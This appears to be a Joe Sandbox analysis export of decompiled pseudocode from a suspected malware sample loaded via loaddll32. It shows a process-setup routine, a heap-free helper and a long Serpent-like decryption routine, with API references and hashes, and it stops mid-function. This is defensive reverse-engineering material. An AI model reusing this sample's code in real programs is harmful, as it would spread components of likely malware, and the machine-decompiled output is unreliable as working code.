0x007da16c
0x007da16c
0x007da177
0x007da179
0x007da183
0x007da188
0x007da188
0x007da183
0x007da18f
0x007da1a5
0x007da191
0x007da191
0x007da19e
0x007da19e
0x007da1a9
0x007da1ab
0x007da1ae
0x007da1af
0x007da1b6
0x007da1b8
0x007da1b9
0x007da1b9
0x007da1b6
0x007da1c0
0x007da1d6
0x007da1c2
0x007da1c2
0x007da1cf
0x007da1cf
0x007da1da
0x007da1e8
0x007da1f2
0x007da1f2
0x007da1f9
0x007da20f
0x007da1fb
0x007da1fb
0x007da208
0x007da208
0x007da213
0x007da226
0x007da226
0x007da22b
0x007da231
0x00000000
0x007da215
0x007da218
0x007da21f
0x007da224
0x007da236
0x007da238
0x007da24e
0x007da23a
0x007da23a
0x007da247
0x007da247
0x007da252
0x007da25e
0x007da263
0x007da263
0x007da254
0x007da257
0x007da257
0x007da271
0x007da276
0x007da283
0x007da287
0x007da287
0x00000000
0x007da224
0x007da213

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,007D59CF,?,63699BC3,007D59CF,?,63699BC3,00000005,007DD00C,00000008,?,007D59CF), ref: 007DA0B7
StrToIntExA.SHLWAPI(00000000,00000000,?,007D59CF,?,63699BC3,007D59CF,?,63699BC3,00000005,007DD00C,00000008,?,007D59CF), ref: 007DA0E9
StrToIntExA.SHLWAPI(00000000,00000000,?,007D59CF,?,63699BC3,007D59CF,?,63699BC3,00000005,007DD00C,00000008,?,007D59CF), ref: 007DA11B
StrToIntExA.SHLWAPI(00000000,00000000,?,007D59CF,?,63699BC3,007D59CF,?,63699BC3,00000005,007DD00C,00000008,?,007D59CF), ref: 007DA14D
StrToIntExA.SHLWAPI(00000000,00000000,?,007D59CF,?,63699BC3,007D59CF,?,63699BC3,00000005,007DD00C,00000008,?,007D59CF), ref: 007DA17F
HeapFree.KERNEL32(00000000,007D59CF,007D59CF,?,63699BC3,007D59CF,?,63699BC3,00000005,007DD00C,00000008,?,007D59CF), ref: 007DA276

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 53be8823c24d4049428c95d414e74f196be0b77ee4173999bdf867af0a5271cd
Instruction ID: 625762fe79d7d9d4334c89f556a38e901f7b4c53e58893f5f9b448c0e303dcb1
Opcode Fuzzy Hash: 53be8823c24d4049428c95d414e74f196be0b77ee4173999bdf867af0a5271cd
Instruction Fuzzy Hash: 296186B5601208FBDB20EB79CDC9D5B77F9BB88740B284917A401D7355F63EED408626

Uniqueness

Uniqueness Score: -1.00%

Function 007DA499, Relevance: 7.5, APIs: 5, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007DA499(intOrPtr _a4) {
				void* _t2;
				long _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t13;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x7dd26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t13 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x7dd25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x7dd258 = _t6;
					 *0x7dd264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x7dd254 = _t7;
					if(_t7 == 0) {
						 *0x7dd254 =  *0x7dd254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 > 0) {
					goto L5;
				}
				_t13 = _t4 - _t4;
				goto L4;
			}

0x007da4a1
0x007da4a9
0x007da4ae
0x00000000
0x007da503
0x007da4b0
0x007da4b8
0x007da4c0
0x007da4c0
0x007da500
0x00000000
0x007da500
0x007da4c2
0x007da4c2
0x007da4c7
0x007da4d9
0x007da4de
0x007da4e4
0x007da4ec
0x007da4f1
0x007da4f3
0x007da4f3
0x00000000
0x007da4fa
0x007da4bc
0x00000000
0x00000000
0x007da4be
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,007D94B4,?,?,00000001,?,?,?,007D80BD,?), ref: 007DA4A1
GetVersion.KERNEL32(?,00000001,?,?,?,007D80BD,?), ref: 007DA4B0
GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,007D80BD,?), ref: 007DA4C7
OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,007D80BD,?), ref: 007DA4E4
GetLastError.KERNEL32(?,00000001,?,?,?,007D80BD,?), ref: 007DA503

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID:
API String ID: 2270775618-0
Opcode ID: 245c9f54f87369b34de84ddc5af8bb006e4bbee04784747bd6484ab531ecdc65
Instruction ID: df1e8c4788adb4e8c6538cc87af6640b7c502dba6dcd48a13fab0b54216713a7
Opcode Fuzzy Hash: 245c9f54f87369b34de84ddc5af8bb006e4bbee04784747bd6484ab531ecdc65
Instruction Fuzzy Hash: 9FF04970682382EADB309F68AE09B153BB4B744751F10C52BE146D62E0E2BC9841CB2E

Uniqueness

Uniqueness Score: -1.00%

Function 007D5B45, Relevance: 2.9, Strings: 1, Instructions: 1669
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E007D5B45(void* __eax, signed int* __edx, signed int* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int* _t544;
				signed int _t545;
				signed int _t546;
				signed int _t555;
				signed int _t557;
				signed int _t563;
				signed int _t566;
				signed int _t576;
				signed int _t580;
				signed int _t582;
				signed int _t588;
				signed int _t592;
				signed int _t595;
				signed int _t596;
				signed int _t606;
				signed int _t608;
				signed int _t614;
				signed int _t617;
				signed int _t627;
				signed int _t631;
				signed int _t633;
				signed int _t639;
				signed int _t643;
				signed int _t646;
				signed int _t647;
				signed int _t657;
				signed int _t659;
				signed int _t665;
				signed int _t668;
				signed int _t678;
				signed int _t682;
				signed int _t684;
				signed int _t690;
				signed int _t694;
				signed int _t697;
				signed int _t698;
				signed int _t708;
				signed int _t710;
				signed int _t716;
				signed int _t719;
				signed int _t729;
				signed int _t733;
				signed int _t735;
				signed int _t736;
				signed int _t738;
				signed int _t742;
				signed int _t749;
				signed int _t752;
				signed int _t754;
				signed int _t755;
				signed int _t758;
				signed int _t764;
				signed int _t765;
				signed int _t769;
				signed int _t772;
				signed int _t779;
				signed int _t785;
				signed int _t787;
				signed int _t790;
				signed int _t795;
				signed int _t804;
				signed int _t807;
				signed int _t813;
				signed int _t814;
				signed int _t817;
				signed int _t825;
				signed int _t828;
				signed int _t829;
				signed int _t831;
				signed int _t836;
				signed int _t837;
				signed int _t841;
				signed int _t844;
				signed int _t851;
				signed int _t857;
				signed int _t859;
				signed int _t862;
				signed int _t867;
				signed int _t876;
				signed int _t879;
				signed int _t885;
				signed int _t886;
				signed int _t889;
				signed int _t897;
				signed int _t900;
				signed int _t901;
				signed int _t903;
				signed int _t908;
				signed int _t909;
				signed int _t913;
				signed int _t916;
				signed int _t923;
				signed int _t929;
				signed int _t931;
				signed int _t934;
				signed int _t939;
				signed int _t948;
				signed int _t951;
				signed int _t957;
				signed int _t958;
				signed int _t961;
				signed int _t969;
				signed int _t972;
				signed int _t973;
				signed int _t975;
				signed int _t980;
				signed int _t981;
				signed int _t985;
				signed int _t988;
				signed int _t995;
				signed int _t1001;
				signed int _t1003;
				signed int _t1006;
				signed int _t1011;
				signed int _t1020;
				signed int _t1023;
				signed int _t1029;
				signed int _t1030;
				signed int _t1033;
				signed int _t1036;
				signed int _t1045;
				signed int* _t1052;
				signed int _t1057;
				signed int _t1058;
				signed int _t1065;
				signed int _t1066;
				signed int _t1068;
				signed int _t1070;
				signed int _t1079;
				signed int _t1080;
				signed int _t1085;
				signed int _t1087;
				signed int _t1089;
				signed int _t1091;
				signed int _t1097;
				signed int _t1100;
				signed int _t1105;
				signed int _t1106;
				signed int _t1108;
				signed int _t1111;
				signed int _t1113;
				signed int _t1115;
				signed int _t1116;
				signed int _t1121;
				signed int _t1125;
				signed int _t1132;
				signed int _t1133;
				signed int _t1135;
				signed int _t1137;
				signed int _t1146;
				signed int _t1147;
				signed int _t1152;
				signed int _t1154;
				signed int _t1156;
				signed int _t1158;
				signed int _t1164;
				signed int _t1167;
				signed int _t1172;
				signed int _t1173;
				signed int _t1175;
				signed int _t1178;
				signed int _t1180;
				signed int _t1182;
				signed int _t1183;
				signed int _t1188;
				signed int _t1192;
				signed int _t1199;
				signed int _t1200;
				signed int _t1202;
				signed int _t1204;
				signed int _t1213;
				signed int _t1214;
				signed int _t1219;
				signed int _t1221;
				signed int _t1223;
				signed int _t1225;
				signed int _t1231;
				signed int _t1234;
				signed int _t1239;
				signed int _t1240;
				signed int _t1242;
				signed int _t1245;
				signed int _t1247;
				signed int _t1249;
				signed int _t1250;
				signed int _t1255;
				signed int _t1259;
				signed int _t1266;
				signed int _t1267;
				signed int _t1269;
				signed int _t1271;
				signed int _t1280;
				signed int _t1281;
				signed int _t1286;
				signed int _t1288;
				signed int _t1290;
				signed int _t1292;
				signed int _t1298;
				signed int _t1301;
				signed int _t1306;
				signed int _t1307;
				signed int _t1309;
				signed int _t1312;
				signed int _t1314;
				signed int _t1316;
				signed int _t1323;
				signed int _t1324;
				signed int _t1328;
				signed int _t1334;
				signed int _t1338;
				signed int _t1340;
				signed int _t1343;
				signed int _t1347;
				signed int _t1355;
				signed int _t1357;
				signed int _t1361;
				signed int _t1364;
				signed int _t1369;
				signed int _t1373;
				signed int _t1384;
				signed int _t1393;
				signed int _t1394;
				signed int _t1396;
				signed int _t1400;
				signed int _t1404;
				signed int _t1406;
				signed int _t1409;
				signed int _t1413;
				signed int _t1421;
				signed int _t1423;
				signed int _t1427;
				signed int _t1430;
				signed int _t1435;
				signed int _t1439;
				signed int _t1450;
				signed int _t1459;
				signed int _t1460;
				signed int _t1462;
				signed int _t1466;
				signed int _t1470;
				signed int _t1472;
				signed int _t1475;
				signed int _t1479;
				signed int _t1487;
				signed int _t1489;
				signed int _t1493;
				signed int _t1496;
				signed int _t1501;
				signed int _t1505;
				signed int _t1516;
				signed int _t1525;
				signed int _t1526;
				signed int _t1528;
				signed int _t1532;
				signed int _t1536;
				signed int _t1538;
				signed int _t1541;
				signed int _t1545;
				signed int _t1553;
				signed int _t1555;
				signed int _t1559;
				signed int _t1562;
				signed int _t1568;
				signed int _t1572;
				signed int _t1579;
				signed int _t1580;
				signed int _t1586;
				signed int _t1589;
				signed int _t1591;
				signed int _t1596;
				signed int _t1597;
				signed int _t1599;
				signed int _t1600;
				signed int _t1603;
				signed int _t1608;
				signed int _t1609;
				signed int _t1613;
				signed int _t1616;
				signed int _t1622;
				signed int _t1623;
				signed int _t1629;
				signed int _t1631;
				signed int _t1633;
				signed int _t1634;
				signed int _t1636;
				signed int _t1639;
				signed int _t1652;
				signed int _t1658;
				signed int _t1661;
				signed int _t1663;
				signed int _t1668;
				signed int _t1669;
				signed int _t1671;
				signed int _t1672;
				signed int _t1675;
				signed int _t1680;
				signed int _t1681;
				signed int _t1685;
				signed int _t1688;
				signed int _t1694;
				signed int _t1695;
				signed int _t1701;
				signed int _t1703;
				signed int _t1705;
				signed int _t1706;
				signed int _t1708;
				signed int _t1711;
				signed int _t1724;
				signed int _t1730;
				signed int _t1733;
				signed int _t1735;
				signed int _t1740;
				signed int _t1741;
				signed int _t1743;
				signed int _t1744;
				signed int _t1747;
				signed int _t1752;
				signed int _t1753;
				signed int _t1757;
				signed int _t1760;
				signed int _t1766;
				signed int _t1767;
				signed int _t1773;
				signed int _t1775;
				signed int _t1777;
				signed int _t1778;
				signed int _t1780;
				signed int _t1783;
				signed int _t1796;
				signed int _t1802;
				signed int _t1805;
				signed int _t1807;
				signed int _t1812;
				signed int _t1813;
				signed int _t1815;
				signed int _t1816;
				signed int _t1819;
				signed int _t1824;
				signed int _t1825;
				signed int _t1829;
				signed int _t1832;
				signed int _t1838;
				signed int _t1839;
				signed int _t1848;
				signed int _t1849;
				signed int _t1851;
				signed int _t1852;
				signed int _t1854;
				signed int _t1857;
				signed int* _t1861;

				_t1052 = __edx;
				_t1 =  &(_t1052[2]); // 0xf883ec45
				_t754 =  *_t1;
				_t2 =  &(_t1052[3]); // 0xf8458903
				_t545 =  *_t2;
				_t1579 =  *__edx;
				_t3 =  &(_t1052[1]); // 0x8b4875fc
				_t1323 =  *_t3;
				_v40 = _t754;
				_t755 = _t754 ^  *(__eax + 0x228);
				_v48 = _t1579;
				_t1580 = _t1579 ^  *(__eax + 0x220);
				_v44 = _t1323;
				_t1324 = _t1323 ^  *(__eax + 0x224);
				_v12 = _t755;
				_v36 = _t545;
				_t546 = _t545 ^  *(__eax + 0x22c);
				_t758 = (_t1324 | _t1580) & _t546;
				_v8 = _t1324 & _t1580 | _t755;
				_t1057 = _t758 ^ _v8;
				_v16 = _t758 ^ _t1324;
				_t764 = ( !_t546 ^ _t1057 | _v16) ^ _t1580;
				_t1328 = (_t764 | _t546) ^ _v16 ^ _v12;
				_t1058 = _t1057 ^  *(__eax + 0x21c);
				_t765 = _t764 ^  *(__eax + 0x214);
				_v16 = _t1057 & _t1580 ^ _t1328 ^ _t764 ^ _v8;
				asm("ror ebx, 0x16");
				_t555 =  *(__eax + 0x218) ^ _v16 ^ _t765 << 0x00000007 ^ _t1058;
				asm("ror esi, 0x5");
				_t1586 =  *(__eax + 0x210) ^ _t1328 ^ _t765 ^ _t1058;
				asm("ror edx, 0x7");
				asm("ror ecx, 1");
				_v12 = _t1058 ^ _t1586 << 0x00000003 ^ _t555;
				asm("ror ebx, 0x3");
				asm("ror esi, 0xd");
				_v16 = _t765 ^ _t555 ^ _t1586;
				_t1065 = ( !_t555 | _t1586) ^ _v16 ^ _v12;
				_t769 = _t555 ^ _t1586;
				_t1589 = (_t1586 | _v16) ^ _t1065 | _t769 & _v16;
				_t1334 = _t1589 ^ _t555;
				_t1066 = _t1065 ^  *(__eax + 0x204);
				_t557 =  !_t1065;
				_t772 = (_t769 | _v12) ^ _t557 ^ _t1589;
				_t1591 = _t772 ^  *(__eax + 0x20c);
				_v12 = _t772 & _t1334;
				asm("ror ecx, 0x16");
				_t779 =  *(__eax + 0x208) ^ _v12 ^ _t557 ^ _v16 ^ _t1066 << 0x00000007 ^ _t1591;
				asm("ror ebx, 0x5");
				_t563 =  *(__eax + 0x200) ^ _t1334 ^ _t1591 ^ _t1066;
				asm("ror esi, 0x7");
				asm("ror edx, 1");
				_t1068 = _t1066 ^ _t779 ^ _t563;
				asm("ror ecx, 0x3");
				_v8 = _t1591 ^ _t563 << 0x00000003 ^ _t779;
				_t1338 =  !_t779;
				_t1596 = _t1338 & _t1068 ^ _v8;
				asm("ror ebx, 0xd");
				_v20 = _t1596;
				_t1597 = _t1596 & _t563;
				_v24 = _t1597;
				_t1599 = _t1597 ^ _t1338 ^ _t1068;
				_v16 = _t1068;
				_v32 = _t1338;
				_t1600 = _t1599 ^  *(__eax + 0x1fc);
				_t1340 = _t1599 | _t1068;
				_t1070 = _v8 | _t563;
				_v12 = _t1070;
				_v28 = _t1340;
				_t1343 = _t1340 & _t563 ^  *(__eax + 0x1f4) ^ _v20;
				asm("ror ecx, 0x16");
				_t785 = (_t779 ^ _t563 | _v24) ^ _t1070 & _v16 ^  *(__eax + 0x1f8) ^ _t1343 << 0x00000007 ^ _t1600;
				asm("ror edx, 0x5");
				_t1079 =  *(__eax + 0x1f0) ^ _v12 ^ _v28 ^ _v32 ^ _t1343 ^ _t1600;
				asm("ror esi, 0x7");
				_t566 = _t1600 ^ _t1079 << 0x00000003 ^ _t785;
				asm("ror edi, 1");
				asm("ror ecx, 0x3");
				_v16 = _t785;
				asm("ror edx, 0xd");
				_t1603 = _t1343 ^ _t785 ^ _t1079;
				_t787 = (_t785 | _t566) ^ _t1603;
				_v8 = _t1603 | _t566;
				_v12 = _t566;
				_t1608 = (_t1079 ^ _t566) & _v8 ^ _t787;
				_t1347 = _t787 & _t1079;
				_t1080 =  !_t1079;
				_t1609 = _t1608 ^  *(__eax + 0x1ec);
				_v32 = _t1080 | _t1608;
				_t1085 =  *(__eax + 0x1e4) ^ _t1347 ^ _v16 ^ _v12;
				_v28 = _v16 ^ _t1608 | _t1080;
				asm("ror edi, 0x16");
				asm("ror ebx, 0x5");
				_t576 =  *(__eax + 0x1e0) ^ _v28 ^ _t787 ^ _t1609 ^ _t1085;
				asm("ror esi, 0x7");
				_t790 = (_t1347 | _v16) ^  *(__eax + 0x1e8) ^ _v32 ^ _v8 ^ _t1085 << 0x00000007 ^ _t1609;
				asm("ror edx, 1");
				_t1087 = _t1085 ^ _t790 ^ _t576;
				asm("ror ecx, 0x3");
				_t1355 = _t790 | _t1087;
				_v8 = _t1609 ^ _t576 << 0x00000003 ^ _t790;
				_t1613 = _t790 ^ _t1087;
				asm("ror ebx, 0xd");
				_v12 = _t1355;
				_t1357 = _t1355 ^ _t790 ^ _t576;
				_t1089 = _t1357 | _v8;
				_v16 = _t1089 ^ _t1613;
				_t795 = _v12 ^ _v8 ^ _t576;
				_t1091 = (_t1089 | _t1613) ^ _t795;
				_t1616 = (_t795 | _v16) ^ _t1357 & _t576 ^  *(__eax + 0x1d4);
				_t804 = (_t1091 & _t576 ^ _v12) & _v16 ^  *(__eax + 0x1dc) ^ _t1357;
				asm("ror edi, 0x16");
				_t1361 =  *(__eax + 0x1d8) ^ _t1091 ^ _t1616 << 0x00000007 ^ _t804;
				asm("ror edx, 0x5");
				_t1097 =  *(__eax + 0x1d0) ^ _v16 ^ _t1616 ^ _t804;
				asm("ror ecx, 0x7");
				asm("ror esi, 1");
				_v12 = _t804 ^ _t1097 << 0x00000003 ^ _t1361;
				_t807 = _t1616 ^ _t1361 ^ _t1097;
				asm("ror edi, 0x3");
				asm("ror edx, 0xd");
				_t580 = _t807 ^ _v12;
				_v16 = _t1361 ^ _t1097;
				_t1622 = _t580 ^ _t1361;
				_t1364 = _t1622 & _t807 ^ _v16;
				_t1623 =  !_t1622;
				_t813 = (( !_t580 | _t1097) ^ _v12 | _v16) ^ _t580;
				_t814 = _t813 ^  *(__eax + 0x1cc);
				_t582 = _t813 | _t1364;
				_t1100 =  *(__eax + 0x1c4) ^ _t582 ^ _t1623;
				asm("ror esi, 0x16");
				_t1629 = _t1623 & _v12 ^  *(__eax + 0x1c8) ^ _t582 ^ _v16 ^ _t1100 << 0x00000007 ^ _t814;
				asm("ror ebx, 0x5");
				_t588 =  *(__eax + 0x1c0) ^ _t1364 ^ _t814 ^ _t1100;
				asm("ror ecx, 0x7");
				asm("ror edx, 1");
				asm("ror esi, 0x3");
				_v8 = _t814 ^ _t588 << 0x00000003 ^ _t1629;
				_v12 = _t1629;
				asm("ror ebx, 0xd");
				_t817 = _t1100 ^ _t1629 ^ _t588;
				_t1631 = _v8 ^ _t588;
				_t1369 = _v12 ^ _t817 ^ _t588;
				_t1105 = (_v8 | _t817) ^ _t1369;
				_v32 = _t1369;
				_v28 = _t1631;
				_t1373 = ((_t1631 | _v12) ^ _t817) & _v32;
				_v32 = _t1373;
				_t1633 = _t1373 ^ _v28;
				_t1634 = _t1633 ^  *(__eax + 0x1b4);
				_t1106 = _t1105 ^  *(__eax + 0x1bc);
				_v16 =  !(_t817 & _t588) ^ _v32;
				asm("ror ecx, 0x16");
				_t825 =  *(__eax + 0x1b8) ^ _v16 ^ _t1633 & _t1105 ^ _t1634 << 0x00000007 ^ _t1106;
				asm("ror edi, 0x5");
				_t1384 = _v8 & _t588 ^  *(__eax + 0x1b0) ^ _v16 ^ _v12 ^ _t1634 ^ _t1106;
				asm("ror edx, 0x7");
				_t1108 = _t1106 ^ _t1384 << 0x00000003 ^ _t825;
				asm("ror esi, 1");
				_t1636 = _t1634 ^ _t825 ^ _t1384;
				asm("ror ecx, 0x3");
				_v12 = _t1108;
				asm("ror edi, 0xd");
				_t592 = _t825 ^ _t1108;
				_v16 = _t1636;
				_t1111 = _t1384 ^ _t1636 ^ _v12;
				_t1639 = (_t1111 | _t825) ^ _t1384;
				_t828 = _t1639 & _t592 ^ _t1111;
				_t1113 = _v16 & _v12;
				_v28 = _t1113;
				_t1115 = (_t1113 | _t828) ^  !_t1639;
				_t1116 = _t1115 ^  *(__eax + 0x1ac);
				_t829 = _t828 ^  *(__eax + 0x1a4);
				_v32 = _t1115 | _t828;
				asm("ror edi, 0x16");
				_v12 = (_t1384 | _v16) ^  *(__eax + 0x1a8) ^  !_t592 ^ _t829 << 0x00000007 ^ _t1116;
				asm("ror esi, 0x5");
				_t1652 =  *(__eax + 0x1a0) ^ _v32 ^ _v28 ^ _t592 ^ _t1116 ^ _t829;
				asm("ror edx, 0x7");
				asm("ror ecx, 1");
				_v8 = _t1116 ^ _t1652 << 0x00000003 ^ _v12;
				_t831 = _t829 ^ _v12 ^ _t1652;
				asm("ror dword [ebp-0x8], 0x3");
				asm("ror esi, 0xd");
				_t595 = (_t831 | _t1652) & _v8;
				_t1121 = _t831 & _t1652 | _v12;
				_t596 = _t595 ^ _t831;
				_t1393 = _t595 ^ _t1121;
				_t836 = ( !_v8 ^ _t1393 | _t596) ^ _t1652;
				_v28 = _t1121;
				_t1125 = (_t836 | _v8) ^ _t596 ^ _v12;
				_t837 = _t836 ^  *(__eax + 0x194);
				_v28 = _v28 ^ _t836;
				_t1394 = _t1393 ^  *(__eax + 0x19c);
				_v32 = _t1393 & _t1652 ^ _t1125;
				asm("ror ebx, 0x16");
				_t606 =  *(__eax + 0x198) ^ _v32 ^ _v28 ^ _t837 << 0x00000007 ^ _t1394;
				asm("ror esi, 0x5");
				_t1658 =  *(__eax + 0x190) ^ _t1125 ^ _t837 ^ _t1394;
				asm("ror edi, 0x7");
				_t1396 = _t1394 ^ _t1658 << 0x00000003 ^ _t606;
				asm("ror ecx, 1");
				asm("ror ebx, 0x3");
				asm("ror esi, 0xd");
				_v16 = _t837 ^ _t606 ^ _t1658;
				_t841 = _t606 ^ _t1658;
				_v12 = _t1396;
				_t1132 = ( !_t606 | _t1658) ^ _v16 ^ _t1396;
				_t1661 = (_t1658 | _v16) ^ _t1132 | _t841 & _v16;
				_t1400 = _t1661 ^ _t606;
				_t1133 = _t1132 ^  *(__eax + 0x184);
				_t608 =  !_t1132;
				_t844 = (_t841 | _v12) ^ _t608 ^ _t1661;
				_t1663 = _t844 ^  *(__eax + 0x18c);
				_v32 = _t844 & _t1400;
				asm("ror ecx, 0x16");
				_t851 =  *(__eax + 0x188) ^ _v32 ^ _t608 ^ _v16 ^ _t1133 << 0x00000007 ^ _t1663;
				asm("ror ebx, 0x5");
				_t614 =  *(__eax + 0x180) ^ _t1400 ^ _t1663 ^ _t1133;
				asm("ror esi, 0x7");
				asm("ror edx, 1");
				_t1135 = _t1133 ^ _t851 ^ _t614;
				asm("ror ecx, 0x3");
				_t1404 =  !_t851;
				_v8 = _t1663 ^ _t614 << 0x00000003 ^ _t851;
				_t1668 = _t1404 & _t1135 ^ _v8;
				asm("ror ebx, 0xd");
				_v32 = _t1668;
				_t1669 = _t1668 & _t614;
				_v16 = _t1135;
				_v28 = _t1669;
				_t1671 = _t1669 ^ _t1404 ^ _t1135;
				_v20 = _t1404;
				_t1672 = _t1671 ^  *(__eax + 0x17c);
				_t1406 = _t1671 | _t1135;
				_t1137 = _v8 | _t614;
				_v12 = _t1137;
				_v24 = _t1406;
				_t1409 = _t1406 & _t614 ^  *(__eax + 0x174) ^ _v32;
				asm("ror ecx, 0x16");
				_t857 = (_t851 ^ _t614 | _v28) ^ _t1137 & _v16 ^  *(__eax + 0x178) ^ _t1409 << 0x00000007 ^ _t1672;
				asm("ror edx, 0x5");
				_t1146 =  *(__eax + 0x170) ^ _v12 ^ _v24 ^ _v20 ^ _t1409 ^ _t1672;
				asm("ror esi, 0x7");
				asm("ror edi, 1");
				asm("ror ecx, 0x3");
				_t617 = _t1672 ^ _t1146 << 0x00000003 ^ _t857;
				_v16 = _t857;
				asm("ror edx, 0xd");
				_t1675 = _t1409 ^ _t857 ^ _t1146;
				_t859 = (_t857 | _t617) ^ _t1675;
				_v8 = _t1675 | _t617;
				_v12 = _t617;
				_t1680 = (_t1146 ^ _t617) & _v8 ^ _t859;
				_t1413 = _t859 & _t1146;
				_t1147 =  !_t1146;
				_t1681 = _t1680 ^  *(__eax + 0x16c);
				_v32 = _t1147 | _t1680;
				_t1152 =  *(__eax + 0x164) ^ _t1413 ^ _v16 ^ _v12;
				_v28 = _v16 ^ _t1680 | _t1147;
				asm("ror edi, 0x16");
				asm("ror ebx, 0x5");
				_t627 =  *(__eax + 0x160) ^ _v28 ^ _t859 ^ _t1681 ^ _t1152;
				asm("ror esi, 0x7");
				_t862 = (_t1413 | _v16) ^  *(__eax + 0x168) ^ _v32 ^ _v8 ^ _t1152 << 0x00000007 ^ _t1681;
				asm("ror edx, 1");
				_t1154 = _t1152 ^ _t862 ^ _t627;
				asm("ror ecx, 0x3");
				_t1421 = _t862 | _t1154;
				_v8 = _t1681 ^ _t627 << 0x00000003 ^ _t862;
				_v12 = _t1421;
				asm("ror ebx, 0xd");
				_t1685 = _t862 ^ _t1154;
				_t1423 = _t1421 ^ _t862 ^ _t627;
				_t1156 = _t1423 | _v8;
				_v16 = _t1156 ^ _t1685;
				_t867 = _v12 ^ _v8 ^ _t627;
				_t1158 = (_t1156 | _t1685) ^ _t867;
				_t1688 = (_t867 | _v16) ^ _t1423 & _t627 ^  *(__eax + 0x154);
				_t876 = (_t1158 & _t627 ^ _v12) & _v16 ^  *(__eax + 0x15c) ^ _t1423;
				asm("ror edi, 0x16");
				_t1427 =  *(__eax + 0x158) ^ _t1158 ^ _t1688 << 0x00000007 ^ _t876;
				asm("ror edx, 0x5");
				_t1164 =  *(__eax + 0x150) ^ _v16 ^ _t1688 ^ _t876;
				asm("ror ecx, 0x7");
				asm("ror esi, 1");
				_v12 = _t876 ^ _t1164 << 0x00000003 ^ _t1427;
				_t879 = _t1688 ^ _t1427 ^ _t1164;
				asm("ror edi, 0x3");
				asm("ror edx, 0xd");
				_t631 = _t879 ^ _v12;
				_v16 = _t1427 ^ _t1164;
				_t1694 = _t631 ^ _t1427;
				_t1430 = _t1694 & _t879 ^ _v16;
				_t1695 =  !_t1694;
				_t885 = (( !_t631 | _t1164) ^ _v12 | _v16) ^ _t631;
				_t886 = _t885 ^  *(__eax + 0x14c);
				_t633 = _t885 | _t1430;
				_t1167 =  *(__eax + 0x144) ^ _t633 ^ _t1695;
				asm("ror esi, 0x16");
				_t1701 = _t1695 & _v12 ^  *(__eax + 0x148) ^ _t633 ^ _v16 ^ _t1167 << 0x00000007 ^ _t886;
				asm("ror ebx, 0x5");
				_t639 =  *(__eax + 0x140) ^ _t1430 ^ _t886 ^ _t1167;
				asm("ror ecx, 0x7");
				asm("ror edx, 1");
				_v8 = _t886 ^ _t639 << 0x00000003 ^ _t1701;
				asm("ror esi, 0x3");
				_v12 = _t1701;
				_t889 = _t1167 ^ _t1701 ^ _t639;
				asm("ror ebx, 0xd");
				_t1435 = _v12 ^ _t889 ^ _t639;
				_t1172 = (_v8 | _t889) ^ _t1435;
				_t1703 = _v8 ^ _t639;
				_v32 = _t1435;
				_v28 = _t1703;
				_t1439 = ((_t1703 | _v12) ^ _t889) & _v32;
				_v32 = _t1439;
				_t1705 = _t1439 ^ _v28;
				_t1706 = _t1705 ^  *(__eax + 0x134);
				_t1173 = _t1172 ^  *(__eax + 0x13c);
				_v16 =  !(_t889 & _t639) ^ _v32;
				asm("ror ecx, 0x16");
				_t897 =  *(__eax + 0x138) ^ _v16 ^ _t1705 & _t1172 ^ _t1706 << 0x00000007 ^ _t1173;
				asm("ror edi, 0x5");
				_t1450 = _v8 & _t639 ^  *(__eax + 0x130) ^ _v16 ^ _v12 ^ _t1706 ^ _t1173;
				asm("ror edx, 0x7");
				_t1175 = _t1173 ^ _t1450 << 0x00000003 ^ _t897;
				asm("ror esi, 1");
				_t1708 = _t1706 ^ _t897 ^ _t1450;
				asm("ror ecx, 0x3");
				_v12 = _t1175;
				_t643 = _t897 ^ _t1175;
				asm("ror edi, 0xd");
				_t1178 = _t1450 ^ _t1708 ^ _v12;
				_v16 = _t1708;
				_t1711 = (_t1178 | _t897) ^ _t1450;
				_t900 = _t1711 & _t643 ^ _t1178;
				_t1180 = _v16 & _v12;
				_v28 = _t1180;
				_t1182 = (_t1180 | _t900) ^  !_t1711;
				_t1183 = _t1182 ^  *(__eax + 0x12c);
				_t901 = _t900 ^  *(__eax + 0x124);
				_v32 = _t1182 | _t900;
				asm("ror edi, 0x16");
